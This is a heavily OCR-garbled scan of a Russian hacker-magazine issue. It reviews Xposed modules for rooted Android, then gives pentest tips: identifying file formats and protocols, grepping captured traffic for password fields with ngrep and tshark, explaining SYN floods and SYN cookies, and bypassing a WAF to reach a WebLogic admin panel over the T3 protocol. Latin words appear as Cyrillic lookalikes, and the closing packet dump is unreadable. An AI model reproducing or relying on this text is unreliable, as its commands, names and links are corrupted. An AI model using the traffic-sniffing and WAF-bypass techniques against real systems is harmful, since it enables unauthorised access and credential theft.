А05Р Іхюкзсгееп ( аоо.а І/Іх Аі 58) . Модуль за- 
меняет экран блокировки на стандартный из по- 
ставки АпсІгоісІ, без модификаций производителя 
смартфона. Будет полезен тем, кто хочет полу- 
чить Іоок апсі ТееІ обычного АпсІгоісІ, не устанавли- 
вая стороннюю прошивку. 

АррЗейіпдз ( доо.дІ/ЕІУХхі ). Добавляет 
в любую прошивку функциональность, анало- 
гичную настройкам приложений в прошивке 
Ра га поі б АпсІгоісІ. С его помощью можно изменять 
значение ЭРІ для отдельно взятых приложений, 
отключить показ строки состояния во время их 
работы, отключить гашение экрана или изменить 
язык. С помощью изменения ЭРІ можно сделать 
так, чтобы приложение работало в планшетном 
режиме на телефоне (ОРІ = 160) или в телефон- 
ном на планшете (ОРІ > 240). 

Вайе г у ТМетеіпд ( юо.дІ/ОРхРпѵ ). Модуль 
с большим количеством различных стилей ото- 
бражения заряда батареи, от круговых до различ- 
ных символов и изображений. 

ХТІіетеЕпдіпе ( аоо.аІ/ЕЗХМт І. Полноценный 
движок тем, практически повторяющий аналогич- 
ный движок в прошивке СуаподепМоб. Позволяет 
полностью изменять внешний вид интерфейса, 
включая иконки, но по техническим причинам не- 
совместим с темами для СуаподепМоб. Встро- 
енного репозитория тем также нет, так что их 
придется искать самостоятельно. Небольшую 
коллекцию можно найти здесь: аоо.аІ/ЗРІ5У1 . 



Ісоп ТРетег < аоо.аІ/2зТО8Ш . Еще один дви- 
жок тем, в этот раз для замены иконок. Позволя- 
ет использовать комплекты иконок, созданные 
для кіоѵа ІдипсМег, Арех ЬаипсИег и АРМ І_аипсРег, 
в любых ланчерах. Сотни различных айконпаков 
можно найти в Ооодіе РІау. 

ѴѴізботЗку Хріоіі ( аоо.а1/1.и 819 ). Модуль 
для глубокой кастомизации строки состояния. 
Позволяет изменять цвета, стиль отображения 
часов и батареи и многое другое. 

КОЛЛЕКЦИИ твиков 

Кроме модулей узконаправленной функциональ- 
ности, есть и целые коллекции твиков в стиле 
«все в одном». Они позволяют делать множество 
вещей — от изменения цвета часов в строке со- 
стояния до включения различных скрытых функ- 
ций, вроде переворота локскрина в зависимости 
от положения экрана или эффекта выключения 
экрана в стиле старого телевизора (его мож- 
но найти в прошивках устройств серии Мехиз 
и СуаподепМоб). 

СгаѵіІіуВох (доо. дІ/іі іѴізІ ) — одна из таких 
коллекций твиков и доработок с акцентом на ря- 
довых пользователей. Наиболее интересные воз- 
можности: 

• Всплывающие наэкранные клавиши нави- 
гации в стиле РІЕ из РагапоібАпбгоіб. После 
активации наэкранные клавиши управления 
внизу экрана исчезают, а вместо них по- 
являются всплывающие с одной из сторон 
экрана кнопки. Очень удобная тизі Раѵе 
функциональность (также доступна в при- 
ложении І_МТ І_аипсИег). 
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Арр ЗеПіпдз позволяет изменить внешний вид и поведение любого приложения 
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Достаточно изменить значение ОРІ на 160, и интерфейс приложения изменится 
на планшетный 
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* Возможность изменения расположения и уда- 
ления кнопок (тайлов) быстрого управления 
питанием в шторке. Также доступно несколько 
дополнительных кнопок, в том числе фонарик 
и быстрое включение точки доступа. 

• Возможность изменения строки состояния, ее 
цвета, цвета текста и стиля отображения бата- 
реи и часов, изменения фонового изображе- 
ния и прозрачности шторки. 

Расширенное меню выключения с возможно- 
стью перезагрузки в Несоѵегу. 

* Переключение композиций в стандартном 
плеере с помощью долгого нажатия на кнопки 
громкости. 

* Исправление самого известного небага 
Апбгоіб — отображение фото звонящего 
не на весь экран (есть в виде отдельного мо- 
дуля: доо.аІ/т^Юѵі- ) . 

• Эффект выключения экрана в стиле старого 
телевизора. 

* Авторазворот виджетов на локскрине. 

♦ Включение режима вибро при перевороте 
смартфона экраном вниз. 

• Патч для уязвимости Мазіег Кеу (возмож- 
ность внедрения любых файлов в системный 
АРК-пакет и его установки без предупрежде- 
ний). Есть в виде отдельного модуля (доо.ді/ 

д4ПеИ). 

* Гибкое управление подсветкой кнопок и све- 
тодиодом. 

• Исправление множества багов, присутствую- 
щих в прошивках для МТК6589-устройств (ки- 
тайские смартфоны 2013 года выпуска). 

Еще одна популярная коллекция — это 

МойаСо Тооікіі ( аоо.а1/М28АаЦ ). сборник до- 
вольно специфичных и узко направленных твиков 



и хаков с акцентом на смартфоны НТО от извест- 
ного комьюнити МоОаСо. Возможности: 

* Совместимость с рабочим столом РасеЬоок 
Ноте. 

* Маскировка смартфона под устройство с раз- 
решением экрана 720р. Полезно владельцам 
1080р-смартфонов и планшетов, которым 
недоступны некоторые приложения в Соодіе 
РІау. 

* Неограниченный угол поворота экрана при на- 
клоне устройства. 

* Различные твики строки состояния. 

* Возможность изменения настроек Ьиііб.ргор 
на лету (ВОАРЮ, В ПАШ, ОЕѴІСЕ, МСЮЕЦ 
РНСЮІІСТ). Можно использовать для получе- 
ния доступа к приложениям в Соодіе РІау. 

* Работа чипа ИРС даже во время сна устрой- 
ства. Для тех, кто часто пользуется ІЧРС- 
метками (есть как отдельный модуль: доо.ді/ 

РдРтИ). 

* Множество твиков для НТО Опе: отключе- 
ние предупреждения о завышенном уровне 
громкости (одним модулем доо.д1/9МФ.ѵ7і), 
дополнительные опции выключения (пере- 
загрузка, Ресоѵегу), включение смартфона 
кнопкой громкости, отключение бесполезной 
опции КісІ Мобе в Роѵѵег Мели (долгое нажатие 
кнопки включения), иконка Вііпкіееб на рабо- 
чем столе. 

На самом деле в составе тулкита гораздо 
больше модификаций и твиков, но они настолько 
специфичные и нужны столь малому количеству 
пользователей, что смысла описывать их все 
на страницах журнала я не вижу и вместо это- 
го отправляю читателя на страницу приложения 
на ХЭА Оеѵеіорегз. 



ТѵѵеакЬох ( сюо.аІ/ЕОбІг ) — один из первых мо- 
дулей и коллекций твиков для Хрозеб. Интересен 
тем, что обладает небольшой, но действительно 
необходимой функциональностью. 8 комплекте: 
разные стили отображения батареи и уровня сиг- 
нала, регулировка уровней критического заряда 
батареи (по дефолту 5 и 15%), запись разговоров, 
отключение функции включения экрана при от- 
соединении от зарядника (есть в СуаподепМоб), 
переключение между композициями с помо- 
щью качельки громкости, изменение поведения 
при долгом нажатии на кнопку «Домой», ТВ- 
эффект выключения экрана. 

БЕЗОПАСНОСТЬ 

Кроме упомянутого в предыдущем разделе мо- 
дуля, закрывающего баг Мазіег Кеу, для Хрозеб 
доступно еще несколько интересных секьюри- 
ти -модулей. Один из них — это ХРгіѵасу, систе- 
ма принудительного ограничения приложений 
в полномочиях. Второй — РеегВІоск, аналог 
одноименного приложения для ПК, предна- 
значенного для блокировки разных рекламных, 
небезопасных и фишинговых сайтов. Далее мы 
подробно рассмотрим функциональность каж- 
дого из них. 

Начнем с ХРгіѵасу (доо.д|/еѴ\/4Ма), модуля 
для ограничения приложений в полномочиях, 
который работает в связке с системой безопас- 
ности Апбгоіб. Его задача — дать пользователю 
контроль над тем, какие именно полномочия (на- 
пример, доступ к интернету, возможность отправ- 
ки ЗМ5 или запись данных на карту памяти) будут 
разрешены приложению, а какие — нет. По умол- 
чанию Апбгоіб дает приложению доступ ко всем 
запрошенным им полномочиям, но с помощью 
ХРгіѵасу некоторые из них можно отозвать. 
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Длинные списки твиков модуля СгаѵіІуВох 



ОгаѵіІуВох — тюнинг авторегулировки яркости и кнопок управления 
питанием 



СУША $ІШ$ТРАТЕ 



По своей сути Хрозеб — это Апбгоіб -аналог популяр- 
ного приложения Субіа Зибзігаіе для іОЗ, создан- 
ного небезызвестным Заигік, автором репозитория 
Субіа. Зибзігаіе используется в джейлб рей кнут ых 
і-устройствах повсеместно для создания разного рода 
модификаций. Часто фреймворк устанавливается 
в процессе взлома устройства вместе с одноименным 
репозиторием. 

Совсем недавно Заигік выпустил версию Субіа 
Зибзігаіе для Апбгоіб. Фреймворк получился куда более 
продвинутым, чем Хрозеб, он создает меньший оверхед 



на систему, позволяет модифицировать как Лаѵа-код, 
так и нативный, с более продвинутым методом пере- 
хвата управления, основанным на внедрении кода 
и функцией защиты от глючных модификаций (достаточ- 
но загрузить смартфон с зажатой кнопкой уменьшения 
громкости для отключения всех модулей). 

Тем не менее за пол года существования Субіа 
Зибзігаіе для Апбгоіб так и не получила распростране- 
ния. Встроенный маркет содержит всего две модифика- 
ции: движок тем ѴѴіпІегВоагб и Субіа ВаскроП с секьюри- 
ти-патчами. Оба написаны самим Заигік. 




ШРО 

Перехватуправле- 
ния не новая идея, 
она реализована 
в ІШ IX- подобных 
ОС средствами 
предварительной 
загрузки библиотек 
(Ш_РКЕІ_ОАО) 
и перехвата си- 
стемных вызовов 
с помощью рігасе. 
ВМіпбоѵѵзсуще- 
ствуюттехники 
под названием 
сплайсинг и саб- 
классинг, кстати, их 
используют многие 
бэкдоры и трояны. 
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На странице ХрозесІ 
есть файл ХрозесІ - 
ОізаЫег-СѴѴМ.гір, 
который следует ис- 
пользовать для про- 
шивки через Весоѵегу 
в том случае, если 
фреймворк устано- 
вился криво и теперь 
смартфон не загру- 
жается , 




Приложения, помеченные глобусом, имеют доступ в интернет, вое- Однопользовательской игре доступ в интернет не нужен! 

клицательный знак — небезопасные полномочия 
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Лаконичный РеегВІоск 



Сгеепііу и список бодрствующих приложений 



ХРгіѵасу распространяется в виде обычного 
АРК-пакета ( ооо.аІ/ОгЦУ^ ), который, помимо мо- 
дуля, также включает в себя графический менед- 
жер полномочий. Кроме установки АРК-пакета, 
придется прошить через кастомный Весоѵегу- 
фикс для ХрозесІ, необходимый для корректно- 
го ограничения некоторых полномочий (впро- 
чем, модуль работает и без него). Фикс можно 
получить на сайте доо.іт ( оо.іт/сІеѵз/МббВ/ 
хрг іѵэсл ), выбрав подходящий для своей версии 
АпсІгоіС!: ХрозесІ_Ііх_4.0_ѵ2,2Ір, Хрозес1_Ііх_4.1.2Ір, 
ХрозесІ_Ііх_4.2.2Ір или ХрозесІ_Ііх_4-3.2Ір. Работу 
других модулей он не нарушит. 

После установки и активации модуля в ХрозесІ 
в меню приложений появится иконка ХРгіѵасу, 
которая открывает приложение для управления 
полномочиями. Главный экран приложения — это 
список всего софта, установленного в системе. 
По отношению к любому из них можно активиро- 
вать систему ограничения, просто поставив галоч- 
ку напротив и выбрав в открывшемся окне раз- 
решенные привилегии. При этом система сама 
даст подсказки на счет безопасности тех или иных 
полномочий, выделив небезопасные жирным 
шрифтом, а наиболее опасные — розовым фоном. 
К первым, кстати, относятся доступ к учетным за- 
писям и Ю устройства, а ко вторым — интернет 
и хранилище данных. Приложения, запрашива- 
ющие небезопасные полномочия и доступ в ин- 
тернет, также будут выделены в основном списке 
приложений с помощью соответствующих иконок. 

Особо отмечу, что там, где это возможно, 
ХРгіѵасу испол ьзует фиктивные данные вместо яв- 
ного возврата кода ошибки приложению. То есть, 
если запретить приложению читать информацию 
о местоположении и владельце смартфона, мо- 
дуль не станет закрывать доступ к этим данным, 



а вернет фиктивное местоположение и рандомно 
сгенерированную инфу о юзере. Эта особенность 
выгодно отличает ХРгіѵасу от других подобных ре- 
шений, так как очень редко приводит к падению 
приложений из-за отозванных привилегий. 

Второй модуль, РеегВІоск ( ѵлдаѵѵ.реегЫоск. 
сот ) — это альтернативная реализация одно- 
именного приложения для ѴѴіпбоѵѵз. Вся его 
работа заключается в том, чтобы блокировать 
доступ операционной системы и приложений 
к определенным интернет-адресам на основе 
правил и списков. По сути, это аналог АбЫоск+, 
но с возможностью гибкого управления, а самое 
главное, работающий на более низком уровне 
ОС (а не в виде прокси, который сам общается 
с сервером и затем отдает данные системе). 

В настоящее время РеегВІоск использует 
два метода определения блокируемых хостов: 
по наличию АсІ в адресе хоста и на основе спи- 
сков адресов, находящихся в каталоге /зсісагсі/ 
РеегВІоскЫзІз/ в обычных текстовых файлах. 
Первый активирован по умолчанию; чтобы акти- 
вировать второй, придется скачать список хостов 
с какого-либо ресурса, например ѵ ѵ.іЫоскІізІ:. 
сот . Далее файл достаточно положить в указан- 
ный каталоп запустить приложение РеегВІоск Тог 
АпбгоісІ и на вкладке ВІоск І_ізІз нажать кнопку 
ВеЬиіІсІ сасіте ЫоскІізІ. 

СПЕЕШГѴ 

Еще один очень интересный ХрозесІ -модуль — 
это Сгеепііу ( аоо.аІ/НАРІІ ), система, которая 
превращает смартфон в выборочное однозадач- 
ное устройство. Это означает, что после его уста- 
новки у тебя появится возможность «заморозить» 
любое приложение, так что ты сможешь продол- 
жать им пользоваться, но оно не будет работать 



в фоне. К примеру, у тебя установлен твиттер- 
клиент, который каждый час просыпается и начи- 
нает обновлять ленту, просыпается днем, ночью, 
в любое время года. И каждый раз, когда он про- 
сыпается, процессор переводится в менее энер- 
гоэффективный режим, а драйвер ѴѴі-Рі выходит 
из спячки, из-за чего драгоценный заряд батареи 
постепенно утекает в никуда. 

Сгеепііу позволяет полностью отключить 
любую фоновую активность любого приложе- 
ния, при этом оставив его полностью работо- 
способным, так что ленту можно будет обновить 
самостоятельно, когда нужно. По сути, это мяг- 
кий аналог таск-киллера, за тем исключением, 
что он не убивает приложение (с точки зрения 
энергопотребления это еще хуже, чем фоновая 
работа), а просто запрещает ему выполнять фо- 
новые операции. 

Сгеепііу почти полностью автоматизирован, 
поэтому все, что нужно сделать, — это запустить 
его, нажать кнопку + и выбрать из списка наибо- 
лее активные приложения. Система сама рас- 
сортирует приложения по количеству просыпа- 
ний, укажет, для чего они просыпаются и когда 
запланировано следующее бодрствование. Все 
это на русском, так что разобраться будет просто. 
Единственное, я бы не рекомендовал заморажи- 
вать системные приложения и виджеты. 

ВЫВОДЫ 

ХрозесІ — невероятно удобная и эффективная 
система модификации АпсігоісІ, которую можно 
смело вносить в список тизі баѵе приложений 
для всех гооі- юзеров. Описанные в статье моду- 
ли лишь малая часть из того огромного количе- 
ства модификаций, которые можно найти в ин- 
тернете. нс 
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ебетовую или кредитную «Мужскую карту» можно в отделениях 
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Алексей «ОігеепОод» Тюрин, 
Оідііаі Зесигііу 

аагггсІоаФдтаіІ.сот , 
ІѵяНег.сот/апІѵигіп 
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Все описанные програм- 
мы со всей рубрики ищи 
на диске. 




ѴѴАЯШЫС 

Вся информация предоставлена исключительно в ознакомитель- 
ных целях. Ни редакция, ни автор не несут ответственности за лю- 
бой возможный вред, причиненный материалами данной статьи. 



ОПРЕДЕЛИТЬ ТИП ФАЙЛА 



РЕШЕНИЕ 

При пентесте различных систем часто возникает потребность понять, 
с каким типом данных мы имеем дело. Например, есть файл, который об- 
рабатывается исследуемой программой, и необходимо узнать, в каком 
он формате. Или общается клиент с сервером, и «видно», что передается 
какой-то файл, а структура и тип его неясны. И ведь пока достаточно точно 
не поймешь, с чем ты имеешь дело, дальнейшая работа будет просто не- 
эффективна. 

Конечно, задача эта всплывает не так часто. Во многих случаях у нас есть 
возможность посмотреть расширение файла и понять что да как. Или по- 
смотреть первые байты, которые часто указывают на формат. Ну и конечно, 
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обратиться к документации. Но все же это не всегда возможно. Разработ- 
чики, особенно хоть сколько-то специализированного софта, очень любят 
«извращения». 

Приведу пример. Была как-то работка. Вроде бы все просто: приложе- 
ние «клиент-сервер» и общение по НТТР- протоколу. Что тут может быть 
проблемного? Да вот когда мы установили свой прокси между клиентом 
и сервером, то в Вигр’е мы смогли увидеть только НТТР-заголовки, а тело 
запросов оказалось «кракозяберное». После исследования оказалось, 
что тело просто заархивировано Ьгір’ом и при этом отрезан Ьгір-заголовок. 

Другой пример, который как-то встречали {хотя он немного из другой 
темы). Строка, в которой хранились «интересные» данные, была страннова- 
той: визуально похожа на Вазе64, но только текст нельзя было декодировать 
по Вазе64. После реверса ПО оказалось, что там использовалась модифи- 
цированная версия Вазе64. Алгоритм тот же, но подставляемые символы 
другие. В любом случае форматов файлов много, и не всегда удается опре- 
делить их с первого взгляда. 

В качестве одного из быстрых решений можно воспользоваться про- 
граммами-идентификаторами. В них есть набор паттернов для различных 
форматов файлов, и на основе него они могут указать, что за экземпляр, или 
подсказать, в какую сторону копать, если совпадение не точное. 

Такие тулзы достаточно просто находятся в Сети. Одна из них — РіІеІуреЮ 
к юо.аІ/хозКѵИ- 1 ). Очень быстро и удобно. Написана она на РуТНоп + ОТ Пере- 
тащил в окошко файл и видишь статистику, «на что он похож». 

Еще, возможно, будет интересен ресурс от Марко Понтелло {Магсо 
РопіеІІо) ( доо.аІ/ѴУАРЗП . Здесь расположена достаточно большая база 
по различным форматам файлов и их паттернов {в общем-то, РіІеІуреЮ 
на ней и основывается). 



Определяем формат файла 
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ОПРЕДЕЛИТЬ ПРОТОКОЛ ПО СЕТЕВОМУ ТРАФИКУ 




Определяем протоколы в дампе трафика 



РЕШЕНИЕ 

В продолжение предыдущей темы интересен также вопрос с определением 
типа протокола в трафике. Здесь, правда, все значительно труднее. Если 
протоколы низкого уровня определить не проблема (транспортный и ниже), 
а также выделить 55І_-трафик, например, то чистый уровень приложений — 
это уже проблема. 

Конечно, ѴѴігезІіагк (и его аналоги) все хорошо «подсвечивают», но во 
многом на основании привязки протоколов к каким-то типовым портам. От- 
клонения от этого, не говоря уж о смешении протоколов, не позволяют ему 
определить протокол. 

В качестве помощника может пригодится утилита ЗРЮ ( аоо.аІ/ЛкЬУУ ) — 
своего рода концепт идентификатора протоколов. Она задействует гораздо 
больший ряд параметров и паттернов, что серьезно увеличивает вероят- 
ность определения протокола. 

К сожалению, база невелика. Так что в большинстве случаев определять 
протоколы приходится на основании своих познаний и размышлений. 

ЦгігезЬагк (и его аналоги) все хоро- 
шо « подсвечивают », но во многом 
на основании привязки протоколов 
к каким-то типовым портам 



ПОИСК ПОДСТРОКИ В СЕТЕВОМ ТРАФИКЕ 



РЕШЕНИЕ 

Еще одна стандартная задачка — поиск всякой интересной информации 
в незнакомом протоколе. Конечно, во многом главным инструментом опять- 
таки остается ѴѴігезІіагк, который позволяет искать и текстовые строки, 
и Ьех, а также поддерживает юникод... Вот только автоматизировать этот 
процесс с ѴѴігезІіагк нельзя. Простой пример — мы хотим найти поле с паро- 
лем. Но оно ведь может называться раззѵѵогсі, разз, рѵѵб... Что же сделать? 
Есть парочка решений. 

Первое — воспользоваться классической утилиткой пдгер (сокращение 
от ІМеІѵѵогк Згер). Она проста, быстра, хотя и не очень показательна. Одна- 
ко с задачей поиска справляется вполне хорошо. Ыдер может производить 
поиск в рсар-файле или из живого трафика (что тоже может быть интерес- 
но). При этом умеет искать строки, бинарщину, частично поддерживае регу- 
лярные выражения. Вот пример с поиском строки Раззѵѵогсі: 

п^ге р.е х е -I Ііе зі: . рса р "Раззѵѵогсі " 

п&гер.ехе -I Іезіі.рсар -хХ "0x5061737377667264" 

• -I — откуда читать данные; 

• -х — поиск Ііех-строки; 

• -X — вывод в Ііех-формате. 

Как один из минусов можно отметить, что пдгер не воссоздает сессии, 
а ищет данные в отдельных пакетах. Скачать ее можно отсюда: уоо.уі/ 

\ А і Г~> ГГ 1 I л /1 
V V Г I Ц О ‘Г ■ 

Второй вариант — воспользоваться консольным собратом ѴѴігезНагк’а — 
ІзИагк’ом. Он входит в комплект с ѴѴігезИагк’ом, так что устанавливать ни- 
чего не надо. От него нам потребуется возможность вывода только части 
информации (параметр -Т Ііеісіз). Мы можем указать, используя стандарт- 
ные фильтры, какой конкретно поток данных нам необходимо проанализи- 
ровать (например, по типу протокола или по !Р-адресам), чтобы избавиться 
от излишков информации. А дальше указать ему, чтобы он выводил только, 
например, исходящий ІР-адрес (для идентификации пакета) и сами данные 
из пакета. После этого в наших руках вся сила консоли для обработки обыч- 
ного потока строк, в виде дгер’а и других утилит. Для повторения последне- 
го варианта воспользуемся следующим правилом: 

бзНагк.ехе -г іезб.р са р -Т й еісіз -е і р.згс -е сіаба -п | <-■ 

§гер 5061737377667264" 



* -г — откуда читать инфу (возможно прямо с интерфейса); 

• -Т йеісіз — выводить только конкретные поля; 

• -е — перечисление необходимых полей пакета для их вывода; 

* -п — не резолвить ІР в имена. 

При этом следует отметить, что если бы формат пакета (арріісайоп- 
уровень) был известен ІзІіагк’у, то мы могли бы обратиться к конкретному 
его полю, а не просто как к баіа. 
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Отыскиваем различные строки в трафике 
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ЗАЩИТИТЬСЯ ОТ ЗУИ-ФЛУДА 



РЕШЕНИЕ 

Такая техника, как зуп-ТІоосі, некогда была достаточно мощной РоЗ-атакой, 
Хотя, конечно, после изобретения и повсеместного внедрения «зуп-соокіе» 
потенциал ее изрядно подтупил ся и вся тема покрылась пылью. В результа- 
те теперь не так много людей в курсе того, что же такое зуп-соокіе и как оно 
работает. И это мне кажется удивительным, ведь решение само по себе 
оказалось достаточно интересным. Так что позволю себе познакомить тебя 
с ним. Вдобавок скажу, что тема эта пригодится для решения еще одной за- 
дачки, которая будет в следующем номере. 

Итак, для начала нам надо понять, что же такое зуп-флуд. Здесь все про- 
сто, только необходимо вспомнить, как устанавливается ТСР-соединение. 
У нас есть клиент, есть сервер. Клиент посылает первый ТСР-пакет на сер- 
вер с установленным флагом 5ѴМ (зупсЬгопігаІіоп) в заголовках пакета. Сер- 
вер, получив пакет, отвечает вторым ТСР-пакетом, только указывая в заго- 
ловке флаги — 5УЫ и АСК (аскпоѵѵіесіде). Дальше клиент должен ответить 
пакетом с флагом АСК, и данные можно передать. 

Как видишь, всего три шага. А теперь прикинь, что мы с этим можем сде- 
лать. Во-первых, после отправки первого пакета мы вроде как должны (как 
клиенты) дождаться ЗУМ + АСК. Но ведь можем и не дожидаться! А в то же 
время сервер, получив 5УІ\І, обязан ожидать последующего пакета — АСК. 
Во-вторых, первый пакет мы можем послать от любого ІР-адреса, если у нас 
нет цели получить второй пакет от сервера. В-третьих, сами пакеты малень- 
кие по объему. 

Вдобавок к этому, получив ЗУГ\І- пакет, сервер должен «помнить» о ха- 
рактеристиках начавшегося подключения, и это, наверное, самое главное. 
То есть сервер должен помнить, а клиент — нет (если нет цели устанавли- 
вать соединение). 

Таким образом, мы очень просто можем отправить большое количество 
ЗУІЧ-запросов на сервер. И каждый из них он обязан будет контролировать. 
По каждому — должен ожидать АСК- пакет от клиента, после собственного 
ЗУИ + АСК пакета. Итог: на сервере переполняется очередь полуоткрытых 
подключений и легитимные клиенты уже не могут подключиться. Вот так все 
просто. Можешь глянуть на картинке пример. 

Так вот — защита оказалась вполне элегантной. Если не углубляться 
в подробности, то основная фича в том, чтобы избавить сервер от необхо- 
димости вести эти самые очереди. Как же этого добились? Для понимания 
нам надо вспомнить про такое поле ТСР, как Зедиепсе питЬег. Оно пред- 
ставляет собой 32-битное поле и содержит случайное число, по которому 
определяется ТСР-сессия. 

Так вот, при использовании зуп-соокіе отказываются от использова- 
ния зуп -очереди, в которой должны храниться «настройки» подключения. 
А для ее хранения используют как раз это поле — Зедиепсе питЬег. Звучит 
странновато, но все в итоге просто. 

Упрощенная схема по генерации зуп-соокіе: 

1. Берется время прихода ЗУМ-пакета (Іітезіатр), с помощью которого 
можно отмерять 64-секундные промежутки. 

2. Из пакета достается тахітшті зедтепі зіге (МЗЗ), которое необходимо 
хранить в очереди для корректной работы ТСР. 

3. Берется хеш от ІР-адреса и порта клиента и сервера, а также значение 
из первого пункта. 

4. Дальше конкатенируется 5 бит из ЙтезШплр’а, МЗЗ кодируется в значе- 
ние из 3 бит (есть таблица соответствия), а также 24 бита хеша. Итог — 32 
бита, 

5. Сервер кладет их в Зедиепсе питЬег ТСР-пакета, который отправляется 
клиенту (5ѴМ + АСК). 

Резонный вопрос — зачем это все? А затем, что клиент (легитимный) 
будет отвечать серверу пакетом с АСК, но, что важнее, с тем же значени- 
ем, которое сервер прислал ему. То есть клиент пошлет этот Зедиепсе 
питЬег серверу обратно, только теперь оно будет располагаться в другом 
поле — Аскпоміесіде питЬег — и значение будет на единицу больше (это 
по стандарту ТСР так положено). Но главное, сервер, получив обратно это 
значение, сможет «восстановить» изначальный ЗУИ-пакет. Сервер вынима- 
ет Іітезіатр и проверяет, не просрочен ли пакет. Если все ОК, то из трех бит 
он сможет восполнить МЗЗ. А пересчет хеш-функции позволит не беспоко- 
иться о возможности внедриться в соединение за счет перебора зедиепсе 
питЬег. 

Только представь, какое оказалось лаконичное и четкое решение. А глав- 
ный изюм — не нужно дорабатывать и изменять ТСР-протокол! Мне лично 
очень нравится. Да, есть и минусы — продвинутые фичи ТСР срезаются. Но, 
ИМХО, на этом можно поучиться. 




ТСР-НапсІаЬаке классический 
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«ОБОЙТИ ЖАР», ИСПОЛЬЗУЯ ПРОТОКОЛ тз 



РЕШЕНИЕ 

Немного о жизни и веселых штуках-дрюках, которые встречаются на практике. 
Не так давно пришлось заняться ломанием ѴѴеЫодіс’а, в рамках подготовки 
к ВІаск На! І_аз Ѵедаз. Там оказалось очень много веселых моментов, но одна 
ситуация меня совсем позабавила, чем и поделюсь. 

Итак, есть такая штука, какѴѴеЫодіс отОгасІе. Это сервер приложений. Что- 
бы понятней было — это что-то типа Тот саѴ а, только еще больше Епіегргізе. Так 
вот, на нем для исследования был развернут продукт — РеорІеЗоФ Последний 
представляет собой большой портал для управления персоналом или финанса- 
ми. Фактически это не так важно. Важно другое. 

По умолчанию ѴѴеЫ-одіс имеет отдельный специальный ТСР-порт (7001 -й 
вроде), на котором висит веб-консоль для администрирования. Основное же 
веб-приложение обычно висит на каком-нибудь стандартном порту — 80, 443. 
И получается, что все безопасно. Особенно с учетом того, что обычно в интернет 
торчат только определенные порты. Но после обследования РеорІеЗоЙ в связке 
с ѴѴеЬІодіс обнаружилась интересная настройка. И административный интер- 
фейс, и сам портал располагались на одном и том же порту — на 80-м (443-м). 

Быстренько прогуглив мир, я проверил это дело и обнаружил, что очень мно- 
гие РеорІеЗоЙ’ы в такой конфигурации и установлены. То есть по определен- 
ному ІіВІ’у доступна админская панель, «рядом» с самим порталом. На самом 
деле, с учетом того, что было раскопано в РеорІеЗоф это оказалось приличней- 
шим фейлом. Лишь небольшой ряд компаний догадались перенести админ- 
скую панель на другой порт. 

Но больше меня позабавил другой пример. В одном из найденных «в дикой 
природе» образцов админы оставили панель в состоянии по умолчанию, но за- 
крыли к ней доступ, используя ѴѴАР (или какую-то похожую фигню). То есть за- 
претили любые запросы к определенному ІДТиу, Казалось бы, что все ОК, но это 
было до поры до времени. 



Пример под- 
ключения 
к ѴѴеЫ-одіс 
поТЗ 

В ходе исследования ѴѴеЫодіс оказалось, что тот поддерживает такой про- 
приетарный протокол от Огасіе, как ТЗ. По сути, это такой Заѵа-протокол, вроде 
как подвид или развитие технологи ВМІ {гетоіе теФоб іпѵосаііоп). Применяет- 
ся он для администрирования ѴѴеЫ_одіс и дает возможность использовать весь 
тот же функционал, что и админская панель, только еще удобно автоматизиро- 
вать все задачи. 

Но самое забавное, что находится он на том же порту, что и админская па- 
нель. Воттолько формат данных совсем не НТТР.. Если на порт приходит НТТР- 
трафик, то отрабатывает НТТР-обработник, а если ТЗ — то ТЗ-обработчик, Вот 
такой хитрый ѴѴеЫодіс. 

Теперь, думаю, ты понимаешь, к чему все пришло. КНІ_ к панели был забло- 
кирован, но если посылать «чистый» ТЗ на это порт, то подключение к ѴѴеЫодіс 
происходило. Вот и получился такой забавный Ьуразз :). 
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Раск2. ; тетрогагуРаисЫ, . ІтрТГ і .1.] 

I ніріѵепсіогч, , і , . і п»р1ѵег5і опд.-, . хрм. , . х. 5г г г іѵеЫодіс. пѵт.сі ааатаЫеЕптгу ■ 

пе.н, . . . хрг г г 

іѵеЫодіс- соглтоп. іпіегпаі , Реегіпг^оХТі:. I,, гіа^огі, , тіпогт, . гоі ІіпдРатсНт. „ зегѵі сеРэск 

2 . . ТеіирогагуРаісЬ[, . раскадезі, ' [і_*еЬ7оді с/соішіюп/іпЭіегпдІ/РаскадеігтЕо; хг. 

5ѵ,'еЬТ оді е . сотптоп. і глета! . ѵегзіопіпТо. п ецсіер>. . . 

[. . раскадезд.-. . Ф , геі еазеѵегБІопс. . ь іаѵа 1апд/5іМ пд; [. . ѵегзІопігіГйАБВуіеіі. . [вхг . 

1-іѵеЬ 1 оді с. соттоп. ітегпаі , Раскадет^о. , та^оп. . ті логі. . гоП 1 лдраіеііі. . бёгѵі се 

Раскг, . іетрогагураісНі. , іпѵрітітіед,-. ,1, 

і трі ѵепгіогд, л,, іррі ѵегбіопд.-. ♦ хри, ,,х , 5 г, .меЫодіс. г^ут* іѵмто. , .хрѵѵ 

I I . , . . = , х . . , 172, 16, 0. 150. , 172, 16, 0. 150", * п. . , . . , „ V. . , , . . . , * . . . х . . , . . > . . . * , К. * . . , . . . 5г . .ме 

Ыоді с. г ]ѴПх 1ѴМЮ. I. . хрѵ;", х ...... х . . 192. 168, 184. 132&. "7. . . х х е. . 

V. С . >. . . 5. \. . 7й. уз г . хг. хп хр. . . 

РРРРРР- - ■ 

.... * ........ р ИЗ: //172. 16. 0. 150: "001. ... 5Г. . меЫодіс. гдѵп. с1а55ТаЫ еЕпігу/ 

йе. ли ..... хрг, , ыеЬІодіс. г ]ѵт, с1Ц5гегіпгТо90. 5. . .5. . * . . хр«. ». х. ....... 5Г. . меЫодіс. г ]ѵт. сіа 

5.5ТаЫ еспигу, нехМ. .... хХрГх 

ІнеЬІоді с. сотптоп. тпиегпа! . Раскааеіп'Ро. . і. . тадогі, . тіпогіх . гоіі іпдраисііі. . аегѵісс- 

рдскг. /сетрогагуРассЬЕх . ігирітігіеи. . и 5аѵа/Тапд/5ігі пд; и. 

1 трі ѵепсіогд. . и. . і тпріѵегзл'опд.-, . хрѵ/ х. ........ бг. . іѵеЫодіс. г |ѵт.сі а^БТаЫ еЕпигу/ 

К,е.м. . . , . . хрг . іиеЫоді с. сошпіюл. і птегпаі . ѵѳгбіопіпФо. м еоййр>. . . г . , раскадеБТ, ' [и«еЬ іодіс/ 
сотпюп/іпгсегпаі /Раскадеіп^о; і, . геІеаБеѵегБІопг. . идаѵа/іапд/'бггіпд; 

[х . ѵегБІоптлТол^вусейі . . [ехг. 

